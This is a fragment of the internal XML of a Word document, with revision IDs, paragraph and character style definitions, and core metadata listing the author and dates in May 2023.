    <w:rsid w:val="005F258D"/>
    <w:rsid w:val="00754007"/>
    <w:rsid w:val="00827782"/>
    <w:rsid w:val="00977109"/>
    <w:rsid w:val="00B37770"/>
    <w:rsid w:val="00C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7A93"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9A6BDACF-3879-4033-A558-04B1A99D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73A3C"/>
        <w:kern w:val="2"/>
        <w:sz w:val="26"/>
        <w:szCs w:val="27"/>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5F258D"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:spacing w:before="40" w:after="0"/>
      <w:ind w:left="360" w:hanging="3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258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61C8"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004C61C8"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="004C6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unagamex.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8B48-431C-4A99-B257-16ECBD42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Ý</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Nguyễn Thanh Ý</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-05-17T15:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-17T16:40:00Z</dcterms:modified>
</cp:coreProperties>
</file>